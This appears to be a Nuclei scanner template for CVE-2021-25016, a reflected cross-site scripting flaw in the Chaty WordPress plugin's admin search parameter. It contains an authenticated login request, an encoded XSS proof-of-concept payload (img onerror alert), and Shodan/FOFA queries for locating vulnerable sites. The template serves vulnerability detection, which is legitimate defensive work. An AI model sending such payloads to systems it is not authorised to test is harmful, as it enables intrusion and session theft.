id: CVE-2021-25016 info: name: Chaty < 2.8.2 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting. impact: | Attackers can inject malicious JavaScript via reflected XSS in the search parameter, potentially stealing administrator session cookies or accessing chat configuration data. remediation: Fixed in 2.8.3 reference: - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0 - https://nvd.nist.gov/vuln/detail/CVE-2021-25016 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.15671 epss-percentile: 0.94886 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: premio product: chaty framework: wordpress shodan-query: http.html:/wp-content/plugins/chaty/ fofa-query: body=/wp-content/plugins/chaty/ publicwww-query: "/wp-content/plugins/chaty/" tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio,vuln http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "search=" - "chaty_page_chaty" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a004830460221009b42790e3f28fbd5c4a2ae752cd5ed22287aec6fb64188b07f8c556edb1032bf0221009f031b7960e1bb3900f7484995c9778138b4b297ae56f95c3be7e5181f14ecec:922c64590222798bb761d5b6d8e72950